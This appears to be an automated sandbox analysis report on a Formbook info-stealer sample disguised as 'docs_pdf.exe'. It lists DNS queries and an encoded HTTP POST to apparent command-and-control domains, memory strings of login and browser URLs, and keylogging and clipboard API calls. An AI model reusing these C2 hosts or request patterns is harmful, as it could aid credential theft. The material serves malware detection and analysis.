Source: global traffic DNS traffic detected: DNS query: www.yexz60.live
Source: global traffic DNS traffic detected: DNS query: www.sodnavisystem.com
Source: global traffic DNS traffic detected: DNS query: www.gymroom.online
Source: global traffic DNS traffic detected: DNS query: www.hectmalt.xyz
Source: global traffic DNS traffic detected: DNS query: www.atlpicsstudios.com
Source: global traffic DNS traffic detected: DNS query: www.bearclaw.bot
Source: global traffic DNS traffic detected: DNS query: www.noghteyab.com
Source: global traffic DNS traffic detected: DNS query: www.mcpcrecycling.com
Source: global traffic DNS traffic detected: DNS query: www.evoolihubs.shop
Source: global traffic DNS traffic detected: DNS query: www.shaf-kupe-msk.store
Source: global traffic DNS traffic detected: DNS query: www.quixaclienti.com
Source: global traffic DNS traffic detected: DNS query: www.789bet1okvip.solutions
Source: global traffic DNS traffic detected: DNS query: www.334es.com
Source: global traffic DNS traffic detected: DNS query: www.411divorce.com
Source: global traffic DNS traffic detected: DNS query: www.sgbet777.org
            Source: unknownHTTP traffic detected: POST /5mht/ HTTP/1.1Host: www.sodnavisystem.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.sodnavisystem.comConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 212Referer: http://www.sodnavisystem.com/5mht/User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)Data Raw: 44 30 50 74 73 30 34 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 46 78 42 41 57 65 54 66 64 66 44 79 2b 78 48 77 49 48 4f 45 36 36 62 65 36 2b 51 63 76 73 53 55 75 55 68 6f 32 56 46 64 5a 62 76 7a 43 66 4e 2f 53 4e 47 61 5a 46 31 4e 53 49 45 64 51 4d 42 41 35 34 4d 48 70 30 63 38 56 68 70 48 49 62 78 48 70 47 43 34 36 57 66 78 37 57 34 2b 62 33 52 79 44 33 74 39 68 46 75 44 4c 64 67 53 54 57 43 71 51 56 41 48 2f 64 6c 4c 6b 79 6b 49 4b 6b 34 61 58 31 65 74 37 79 50 49 6d 70 42 50 4d 41 67 73 77 6d 44 6e 72 7a 2b 44 71 4e 71 6f 43 30 6a 30 77 50 6d 7a 2b 2f 2b 4d 44 4b 69 31 75 54 61 33 58 44 35 6f 2b 66 4f 47 68 43 6e 78 64 61 4e 2f Data Ascii: D0Pts04=U2Ur9XKzU6CWFxBAWeTfdfDy+xHwIHOE66be6+QcvsSUuUho2VFdZbvzCfN/SNGaZF1NSIEdQMBA54MHp0c8VhpHIbxHpGC46Wfx7W4+b3RyD3t9hFuDLdgSTWCqQVAH/dlLkykIKk4aX1et7yPImpBPMAgswmDnrz+DqNqoC0j0wPmz+/+MDKi1uTa3XD5o+fOGhCnxdaN/
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 12 Jul 2024 22:03:06 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Mon, 13 May 2024 05:45:59 GMT | ETag: W/"afe-6184f66651a97" | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 12 Jul 2024 22:03:09 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Mon, 13 May 2024 05:45:59 GMT | ETag: W/"afe-6184f66651a97" | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 12 Jul 2024 22:03:11 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Mon, 13 May 2024 05:45:59 GMT | ETag: W/"afe-6184f66651a97" | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 12 Jul 2024 22:03:14 GMT | Content-Type: text/html | Content-Length: 2814 | Connection: close | Vary: Accept-Encoding | Last-Modified: Mon, 13 May 2024 05:45:59 GMT | ETag: "afe-6184f66651a97" | Data Raw: [HTML body, truncated hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 12 Jul 2024 22:03:19 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: br | Data Raw: [brotli-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 12 Jul 2024 22:03:22 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: br | Data Raw: [brotli-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 12 Jul 2024 22:03:25 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: br | Data Raw: [brotli-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 12 Jul 2024 22:03:27 GMT | Content-Type: text/html | Content-Length: 150 | Connection: close | Vary: Accept-Encoding | Vary: Accept-Encoding | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 12 Jul 2024 22:03:33 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 12 Jul 2024 22:03:35 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 12 Jul 2024 22:03:38 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 12 Jul 2024 22:03:41 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx-reuseport/1.21.1 | Date: Fri, 12 Jul 2024 22:04:52 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx-reuseport/1.21.1 | Date: Fri, 12 Jul 2024 22:04:55 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx-reuseport/1.21.1 | Date: Fri, 12 Jul 2024 22:04:58 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx-reuseport/1.21.1 | Date: Fri, 12 Jul 2024 22:05:00 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 283 | Connection: close | Vary: Accept-Encoding | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.shaf-kupe-msk.store Port 80</address></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 12 Jul 2024 22:05:48 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: public, no-cache | Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/" | X-Frame-Options: SAMEORIGIN | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Server: Prometheus | Pre-Cognitive-Push: Enabled | Quantum-Flux-Capacity: Omega | Referrer-Policy: strict-origin-when-cross-origin | X-Grid-SRCache-TTL: 2592000 | X-Grid-SRCache-Skip: -POST | X-Grid-SRCache-Fetch: BYPASS | X-Grid-SRCache-Store: BYPASS | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 12 Jul 2024 22:05:50 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: public, no-cache | Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/" | X-Frame-Options: SAMEORIGIN | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Server: Prometheus | Pre-Cognitive-Push: Enabled | Quantum-Flux-Capacity: Omega | Referrer-Policy: strict-origin-when-cross-origin | X-Grid-SRCache-TTL: 2592000 | X-Grid-SRCache-Skip: -POST | X-Grid-SRCache-Fetch: BYPASS | X-Grid-SRCache-Store: BYPASS | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 12 Jul 2024 22:05:53 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: public, no-cache | Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/" | X-Frame-Options: SAMEORIGIN | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | Server: Prometheus | Pre-Cognitive-Push: Enabled | Quantum-Flux-Capacity: Omega | Referrer-Policy: strict-origin-when-cross-origin | X-Grid-SRCache-TTL: 2592000 | X-Grid-SRCache-Skip: -POST | X-Grid-SRCache-Fetch: BYPASS | X-Grid-SRCache-Store: BYPASS | Content-Encoding: gzip | Data Raw: [gzip-compressed body, hex dump omitted]
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:06:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:06:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:06:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: isoburn.exe, 00000005.00000002.4553311671.00000000066AE000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000462E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://411divorce.com/6rlx/?D0Pts04=Q2ZAF
            Source: firefox.exe, 0000000A.00000002.2775625932.0000020038AA0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
            Source: isoburn.exe, 00000005.00000002.4553311671.00000000066AE000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000462E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wordpress.org/extend/plugins/nginx-helper/faq/
            Source: HDtHilbfKZE.exe, 00000007.00000002.4553969990.00000000052B3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sgbet777.org
            Source: HDtHilbfKZE.exe, 00000007.00000002.4553969990.00000000052B3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sgbet777.org/aiec/
            Source: isoburn.exe, 00000005.00000002.4555303639.00000000075E0000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.000000000651C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000449C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://301mei.xyz:7788/?u=
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: isoburn.exe, 00000005.00000002.4553311671.0000000005BB0000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4555303639.00000000075E0000.00000004.00000800.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003B30000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: isoburn.exe, 00000005.00000002.4553311671.0000000005BB0000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003B30000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: isoburn.exe, 00000005.00000003.2668197525.000000000786B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: isoburn.exe, 00000005.00000002.4553311671.0000000005ED4000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4P
            Source: isoburn.exe, 00000005.00000002.4553311671.0000000005BB0000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003B30000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?hl=en
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0016425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0016425A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00164458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00164458
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0016425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0016425A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00150219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00150219
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0017CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0017CDAC

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_000F3B4C
            Source: docs_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: docs_pdf.exe, 00000000.00000000.2088726475.00000000001A5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b6e405be-b
